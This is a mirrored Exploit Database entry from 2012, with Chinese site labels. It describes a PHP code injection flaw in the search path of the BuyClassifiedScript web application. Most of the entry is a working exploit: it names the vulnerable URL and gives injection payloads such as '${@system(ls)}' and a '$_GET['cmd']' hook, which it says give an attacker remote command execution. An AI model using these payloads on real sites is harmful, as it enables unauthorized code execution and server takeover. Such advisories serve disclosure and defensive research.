BuyClassifiedScript – PHP Code Injection

• Exploit Database
• 107 阅读

• 作者： d3b4g
  日期： 2012-11-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/22929/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44

  # Exploit Title: buyclassifiedscript PHP code injection vulnerability # Date: 25.11.201 # Exploit Author: d3b4g # Vendor Homepage: http://buyclassifiedscript.com/ # Tested on:Windows 7 # Blog: d3b4g.me       ----------------------------------------------------------------------------------   This vulnerabilityallows an attacker to inject custom code into the server side scripting engine.It's possible to get a remote cmd by taking advantage of this vulnerability. Vulnerable function:   /search/     () php code excution :     http://localhost/path/search {Inject malicious code}     () example of code you can inject:     //${@system(ls)}   ${@print(hello)}   $_GET['cmd']     //       -end-